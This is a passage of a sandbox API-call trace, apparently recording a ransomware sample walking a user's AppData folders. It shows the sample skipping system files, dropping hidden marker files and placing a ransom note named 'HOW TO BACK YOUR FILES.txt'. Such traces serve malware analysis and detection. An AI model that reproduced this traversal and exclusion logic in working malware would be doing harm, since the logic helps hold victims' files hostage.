nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.066] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.066] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.066] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xbf8e963a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7972e3b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe79990a9, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0053.066] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.066] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.066] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0053.066] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0053.066] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0053.066] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0053.066] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0053.067] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0053.067] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0053.067] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0053.067] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0053.067] lstrcpyW (in: lpString1=0x130ebf2, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0053.067] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini", dwFileAttributes=0x2) returned 1 [0053.067] lstrlenW (lpString="desktop.ini") returned 11 [0053.067] lstrlenW (lpString="Rabbit4444") returned 10 [0053.067] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0053.067] lstrlenW (lpString=".dll") returned 4 [0053.067] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0053.067] lstrlenW (lpString=".lnk") returned 4 [0053.067] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0053.067] lstrlenW (lpString=".ini") returned 4 [0053.067] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0053.067] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf8e963a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7972e3b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x61db3fcd, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 1 [0053.067] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.067] lstrcmpiW (lpString1="File Explorer.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.067] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="Rabbit4444.exe") returned -1 [0053.067] lstrcmpiW (lpString1="File Explorer.lnk", lpString2=".") returned 1 [0053.067] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="..") returned 1 [0053.067] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="windows") returned -1 [0053.068] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="bootmgr") returned 1 [0053.068] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="pagefile.sys") returned -1 [0053.068] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="boot") returned 1 [0053.068] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="ids.txt") returned -1 [0053.068] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="NTUSER.DAT") returned -1 [0053.068] lstrcpyW (in: lpString1=0x130ebf2, lpString2="File Explorer.lnk" | out: lpString1="File Explorer.lnk") returned="File Explorer.lnk" [0053.068] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk", dwFileAttributes=0x0) returned 1 [0053.068] lstrlenW (lpString="File Explorer.lnk") returned 17 [0053.068] lstrlenW (lpString="Rabbit4444") returned 10 [0053.068] lstrcmpiW (lpString1="plorer.lnk", lpString2="Rabbit4444") returned -1 [0053.068] lstrlenW (lpString=".dll") returned 4 [0053.068] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0053.068] lstrlenW (lpString=".lnk") returned 4 [0053.068] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0053.068] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf8e963a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7972e3b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x61db3fcd, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 0 [0053.068] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0053.068] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.068] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.070] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.070] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.070] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.070] CloseHandle (hObject=0x278) returned 1 [0053.070] CloseHandle (hObject=0x27c) returned 1 [0053.070] GetCurrentThreadId () returned 0xd98 [0053.070] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0053.070] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0053.070] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xef950 | out: hHeap=0xe0000) returned 1 [0053.070] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0053.070] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0053.071] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0053.071] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.BFC0E91B00AE8A0620D3" [0053.071] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.072] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.075] FlushFileBuffers (hFile=0x27c) returned 1 [0053.076] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.076] CloseHandle (hObject=0x27c) returned 1 [0053.076] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 105 [0053.076] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.076] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x441842cf, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3853abd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8f4802e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0053.076] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.076] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.076] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.076] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.076] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x441842cf, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3853abd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8f4802e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.077] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.077] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.077] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.077] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.077] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.077] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8f4802e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8f4802e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8f4802e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.077] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.077] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.077] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8f4802e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8f4802e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8f4802e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.077] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0053.077] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.077] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.078] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.078] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.078] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.078] CloseHandle (hObject=0x278) returned 1 [0053.078] CloseHandle (hObject=0x27c) returned 1 [0053.078] GetCurrentThreadId () returned 0xd98 [0053.079] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0053.079] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod" [0053.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0053.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0053.079] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod" [0053.079] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\" [0053.079] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\.BFC0E91B00AE8A0620D3" [0053.079] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\inputmethod\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.082] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.084] FlushFileBuffers (hFile=0x27c) returned 1 [0053.085] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.085] CloseHandle (hObject=0x27c) returned 1 [0053.086] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod") returned 53 [0053.086] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.086] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3800a8f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8f6e2f4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0053.086] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.086] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.086] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.086] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.086] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3800a8f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8f6e2f4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.086] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.086] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.086] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.086] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.086] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.086] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8f6e2f4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8f6e2f4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8f6e2f4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.086] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.086] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.086] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8923b24, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe8923b24, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Chs", cAlternateFileName="")) returned 1 [0053.086] lstrcmpiW (lpString1="Chs", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.086] lstrcmpiW (lpString1="Chs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.086] lstrcmpiW (lpString1="Chs", lpString2="Rabbit4444.exe") returned -1 [0053.086] lstrcmpiW (lpString1="Chs", lpString2=".") returned 1 [0053.086] lstrcmpiW (lpString1="Chs", lpString2="..") returned 1 [0053.087] lstrcmpiW (lpString1="Chs", lpString2="windows") returned -1 [0053.087] lstrcmpiW (lpString1="Chs", lpString2="bootmgr") returned 1 [0053.087] lstrcmpiW (lpString1="Chs", lpString2="pagefile.sys") returned -1 [0053.087] lstrcmpiW (lpString1="Chs", lpString2="boot") returned 1 [0053.087] lstrcmpiW (lpString1="Chs", lpString2="ids.txt") returned -1 [0053.087] lstrcmpiW (lpString1="Chs", lpString2="NTUSER.DAT") returned -1 [0053.087] lstrcpyW (in: lpString1=0x130eba4, lpString2="Chs" | out: lpString1="Chs") returned="Chs" [0053.087] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0053.087] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x74) returned 0x10dd68 [0053.087] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf6390 [0053.087] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8923b24, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe8923b24, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Chs", cAlternateFileName="")) returned 0 [0053.087] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0053.087] lstrcpyW (in: lpString1=0x130eba4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.087] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\inputmethod\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.089] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.089] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.089] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.089] CloseHandle (hObject=0x278) returned 1 [0053.089] CloseHandle (hObject=0x27c) returned 1 [0053.089] GetCurrentThreadId () returned 0xd98 [0053.089] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0053.089] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs" [0053.089] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10dd68 | out: hHeap=0xe0000) returned 1 [0053.089] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0053.089] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs" [0053.089] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\" [0053.089] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\.BFC0E91B00AE8A0620D3" [0053.089] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\inputmethod\\chs\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.091] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.093] FlushFileBuffers (hFile=0x27c) 